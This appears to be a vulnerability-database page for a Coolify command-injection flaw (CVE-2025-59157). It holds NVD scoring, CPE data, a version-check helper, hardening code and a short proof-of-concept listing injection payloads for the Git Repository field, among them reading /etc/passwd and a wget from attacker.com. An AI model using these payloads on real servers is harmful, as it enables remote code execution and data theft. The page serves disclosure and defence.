Security Vulnerability Report
CVE-2025-59157 CVSS 9.9 CRITICAL

Published: 2026-01-05 18:15:44
Last Modified: 2026-01-12 15:02:22

Description

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, the Git Repository field during project creation is vulnerable to command injection. User input is not properly sanitized, allowing attackers to inject arbitrary shell commands that execute on the underlying server during the deployment workflow. A regular member user can exploit this vulnerability. Version 4.0.0-beta.420.7 contains a patch for the issue.

CVSS Details

CVSS Score
9.9 (Secondary metric in the NVD record)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
NVD Primary metric
8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
The two scorings differ only in Scope (S:C vs S:U), i.e. whether code execution on the Coolify host from a low-privileged member account is counted as crossing a security boundary. Both agree on network reachability, low complexity, no user interaction and full confidentiality, integrity and availability impact.
Weakness
CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

Configurations (Affected Products)

cpe:2.3:a:coollabs:coolify:*:*:*:*:*:*:*:* (versionEndExcluding 4.0.0) - VULNERABLE
cpe:2.3:a:coollabs:coolify:4.0.0:beta100:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:coollabs:coolify:4.0.0:beta101:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:coollabs:coolify:4.0.0:beta102:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:coollabs:coolify:4.0.0:beta103:*:*:*:*:*:* - VULNERABLE
(the NVD record continues with one entry per 4.0.0 beta build; the list is truncated here, see the raw JSON below)
Affected: Coolify < 4.0.0-beta.420.7
Fixed: Coolify 4.0.0-beta.420.7 and later
Note on matching: the wildcard entry's boundary is expressed against the bare release number 4.0.0, while the fix landed in a pre-release build. Under semver ordering every 4.0.0-beta.* build, patched ones included, sorts below 4.0.0, so a plain "< 4.0.0" match over-reports; the beta number is what decides exposure.
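Deciding exposure from an instance's reported version, or from one of the NVD CPE entries above, needs a comparison that respects pre-release ordering. The helper below is an added example, not part of Coolify or of the NVD feed; it assumes the version shape seen on this page (MAJOR.MINOR.PATCH, optional -beta.N.M suffix, optional leading v) and assumes NVD's "4.0.0:beta100" CPE form corresponds to the tag 4.0.0-beta.100. It also shows why a check keyed only on the wildcard entry's versionEndExcluding 4.0.0 over-reports.

```python
import re

# Fix boundary stated in the advisory: anything strictly older is affected.
FIXED_VERSION = "4.0.0-beta.420.7"

VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?")


def parse_version(text: str):
    """Turn '4.0.0-beta.420.7' (optional leading 'v') into a sortable key.

    Ordering follows semver: release numbers first; a version with a
    pre-release tag sorts below the bare release (4.0.0-beta.420.7 < 4.0.0);
    pre-release identifiers compare left to right, numeric ones as integers,
    and a shorter list that is a prefix of a longer one sorts lower
    (beta.420 < beta.420.7).
    """
    m = VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    release = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4)
    if pre is None:
        return (release, 1, ())  # bare release outranks any pre-release
    # Tag each identifier with a type marker so ints never compare with strs.
    ids = tuple((0, int(p)) if p.isdigit() else (1, p) for p in pre.split("."))
    return (release, 0, ids)


def is_affected(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when `version` is strictly older than the first fixed build."""
    return parse_version(version) < parse_version(fixed)


def naive_release_check(version: str) -> bool:
    """What a check keyed only on the wildcard entry's versionEndExcluding 4.0.0
    reports. Every 4.0.0-beta.* build satisfies it, including patched ones."""
    return parse_version(version) < parse_version("4.0.0")


def cpe_to_version(cpe: str) -> str:
    """Rebuild a version string from an NVD CPE 2.3 'version:update' pair.

    NVD writes beta builds as '4.0.0:beta100'; this maps that to
    '4.0.0-beta.100' (assumed mapping, consistent with the entries on this page).
    A wildcard version is returned unchanged ('*') for the caller to handle.
    """
    fields = cpe.split(":")
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 string: {cpe!r}")
    version, update = fields[5], fields[6]
    if update in ("*", "-"):
        return version
    m = re.fullmatch(r"([A-Za-z]+)(\d+)", update)
    return f"{version}-{m.group(1)}.{m.group(2)}" if m else f"{version}-{update}"


if __name__ == "__main__":
    # CPE entries copied from the configuration list above.
    for cpe in [
        "cpe:2.3:a:coollabs:coolify:4.0.0:beta100:*:*:*:*:*:*",
        "cpe:2.3:a:coollabs:coolify:4.0.0:beta103:*:*:*:*:*:*",
    ]:
        v = cpe_to_version(cpe)
        print(f"{v:<22} affected={is_affected(v)}")
    # Boundary behaviour, including the false positive of the naive check.
    for v in ["4.0.0-beta.420.6", "4.0.0-beta.420.7", "v4.0.0-beta.421", "3.12.36"]:
        print(f"{v:<22} affected={is_affected(v)}  naive<4.0.0={naive_release_check(v)}")
```

The version string to feed in is whatever the instance reports for itself; when only a CPE match from a scanner is available, convert it first with cpe_to_version and discard wildcard results rather than treating them as a hit.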

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-59157 PoC - Coolify Command Injection in Git Repository Field
# This PoC demonstrates command injection via the Git Repository field
# Target: Coolify < 4.0.0-beta.420.7

# Payload construction for command injection
# Using semicolon to chain commands
PAYLOAD='https://github.com/example/repo;cat /etc/passwd > /tmp/pwned'

# Alternative payload using backticks for command substitution
PAYLOAD_ALT='https://github.com/example/repo`whoami`'

# Alternative payload using pipe to chain commands
PAYLOAD_PIPE='https://github.com/example/repo|wget http://attacker.com/shell.sh'

echo "[*] CVE-2025-59157 - Coolify Command Injection"
echo "[*] Target: Coolify < 4.0.0-beta.420.7"
echo "[*] Attack Vector: Git Repository field during project creation"
echo ""
echo "[*] Candidate payloads (single-quoted above so the local shell does not expand them):"
printf '    %s\n' "$PAYLOAD" "$PAYLOAD_ALT" "$PAYLOAD_PIPE"
echo ""
echo "[!] Note: This is for educational and authorized testing purposes only"
echo "[!] Exploitation steps:"
echo "1. Authenticate as a regular member user"
echo "2. Navigate to project creation page"
echo "3. In the Git Repository field, enter the malicious URL with injected commands"
echo "4. Submit the project creation form"
echo "5. The injected commands will be executed when Coolify processes the Git repository"
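The payload shapes above work only because the submitted URL reaches a shell command line intact. The following is an added example, not Coolify's code (the project is PHP; this is a Python sketch of the same pattern), that puts the anti-pattern beside a hardened replacement: allow-list validation of the URL, then invoking git through an argument vector with `--` so no shell ever parses the value. The sample inputs are constructed from the PoC payloads; the git environment variables used (GIT_ALLOW_PROTOCOL, GIT_TERMINAL_PROMPT) are documented git settings.

```python
import os
import re
import subprocess
from urllib.parse import urlsplit

# Constructed sample inputs (not taken from any real Coolify instance): the
# first is benign, the other three are the metacharacter shapes used by the PoC.
SAMPLE_INPUTS = [
    "https://github.com/example/repo",
    "https://github.com/example/repo;cat /etc/passwd > /tmp/pwned",
    "https://github.com/example/repo`whoami`",
    "https://github.com/example/repo|wget http://attacker.com/shell.sh",
]


def build_command_vulnerable(repo_url: str) -> str:
    """Anti-pattern: interpolate user input into a string a shell will parse.

    Anything after ';' or '|', or inside backticks, becomes a second command
    running as whatever account the deployment worker runs as.
    """
    return f"git ls-remote {repo_url}"


# Hardened path: allow-list the URL, then never let a shell see it.
ALLOWED_SCHEMES = {"https", "ssh"}
# Unreserved chars plus the few sub-delims a Git URL legitimately needs.
# Excludes whitespace, quotes, backslash and the metacharacters the PoC relies
# on (; | ` $ ( ) < >). '&' stays for query strings, which is only acceptable
# because the hardened path never invokes a shell.
SAFE_URL_CHARS = re.compile(r"[A-Za-z0-9._~:/@?&=+%-]+")


def validate_repo_url(repo_url: str) -> str:
    """Return repo_url unchanged if it is a plain https:// or ssh:// URL, else raise.

    scp-style 'git@host:path', file://, ext:: and option-looking values are all
    rejected because they never yield an allowed scheme together with a host.
    """
    if not SAFE_URL_CHARS.fullmatch(repo_url):
        raise ValueError("repository URL contains characters outside the allow-list")
    parts = urlsplit(repo_url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        raise ValueError("repository URL must be https:// or ssh:// with a host")
    return repo_url


def build_argv_hardened(repo_url: str) -> list:
    """Argument vector for git: no shell, and '--' ends option parsing so the
    URL can never be interpreted as a git option."""
    return ["git", "ls-remote", "--", validate_repo_url(repo_url)]


def run_hardened(repo_url: str, timeout: int = 30) -> subprocess.CompletedProcess:
    """Execute the validated command without a shell, with git's transport
    allow-list pinned and interactive credential prompts disabled."""
    env = {**os.environ, "GIT_ALLOW_PROTOCOL": "https:ssh", "GIT_TERMINAL_PROMPT": "0"}
    return subprocess.run(build_argv_hardened(repo_url), env=env, capture_output=True,
                          text=True, timeout=timeout, check=False)


def screen_inputs(urls) -> dict:
    """Map each candidate URL to whether the hardened validator accepts it."""
    verdicts = {}
    for url in urls:
        try:
            validate_repo_url(url)
            verdicts[url] = True
        except ValueError:
            verdicts[url] = False
    return verdicts


if __name__ == "__main__":
    for url, ok in screen_inputs(SAMPLE_INPUTS).items():
        print(f"{'ACCEPT' if ok else 'REJECT'}  {url}")
        if not ok:
            print("        shell line would have been:", build_command_vulnerable(url))
```

The validator is intentionally narrow: extending it to other transports means adding a scheme to ALLOWED_SCHEMES and to GIT_ALLOW_PROTOCOL together, and character-level filtering is a second layer rather than the primary control, which is the absence of any shell between the form field and git.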

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59157", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:43.643", "lastModified": "2026-01-12T15:02:21.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, the Git Repository field during project creation is vulnerable to command injection. User input is not properly sanitized, allowing attackers to inject arbitrary shell commands that execute on the underlying server during the deployment workflow. A regular member user can exploit this vulnerability. Version 4.0.0-beta.420.7 contains a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:*:*:*:*:*:*:*:*", "versionEndExcluding": 
"4.0.0", "matchCriteriaId": "FCAEF3B5-C3E0-4DC5-99AC-A9820DE3EA4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta100:*:*:*:*:*:*", "matchCriteriaId": "DD128680-A34B-4D2A-B44A-53FC4E406393"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta101:*:*:*:*:*:*", "matchCriteriaId": "51CEE245-2E82-4928-A900-E7F628B47336"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta102:*:*:*:*:*:*", "matchCriteriaId": "B0C45118-3AE6-443B-8CD9-B2B72CD24383"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta103:*:*:*:*:*:*", "matchCriteriaId": "004E8E36-44E8-4F64-8E2D-8804DF161CD7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta104:*:*:*:*:*:*", "matchCriteriaId": "BC538E12-494F-47EF-8D53-2D7CDAED98BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta105:*:*:*:*:*:*", "matchCriteriaId": "54F12C6A-07B5-42F9-9AE6-281AA189BFF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta106:*:*:*:*:*:*", "matchCriteriaId": "A1936F5B-2A32-4353-A4EA-A337C3A2D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta107:*:*:*:*:*:*", "matchCriteriaId": "B3A90F6B-070F-469F-8206-AE9DFBCE6B61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta108:*:*:*:*:*:*", "matchCriteriaId": "EB776310-84B4-4CC8-B547-5D6A37EF5ECC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta109:*:*:*:*:*:*", "matchCriteriaId": "BF168BC8-E283-40FB-9B28-D048C25BD36F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta110:*:*:*:*:*:*", "matchCriteriaId": "7DDE09ED-3AF5-4B0E-9F69-3B7B05862A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta111:*:*:*:*:*:*", "matchCriteriaId": "2C5174EF-25CC-43DB-B62D-9DA4C9FF640E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta112:*:*:*:*:*:*", "matchCriteriaId": 
"E30EACD4-2556-4A58-8899-810D5D3DEE84"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta113:*:*:*:*:*:*", "matchCriteriaId": "C3FA74D4-46BA-4E89-8DB0-C8114139C8D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta114:*:*:*:*:*:*", "matchCriteriaId": "A520EFF3-97CE-4FBE-A79E-F7CED9876BE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta115:*:*:*:*:*:*", "matchCriteriaId": "4FA1C04E-1A8E-412E-B68A-B48CEF5A78BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta116:*:*:*:*:*:*", "matchCriteriaId": "29DB7B76-A127-4F68-96CD-4285E0FFDDF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta117:*:*:*:*:*:*", "matchCriteriaId": "4F9E71F6-38C1-4649-B69F-F6AF6063FA09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta118:*:*:*:*:*:*", "matchCriteriaId": "A6132969-37D9-4DF1-BFBB-8DD3C4D9434E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta1 ... (truncated)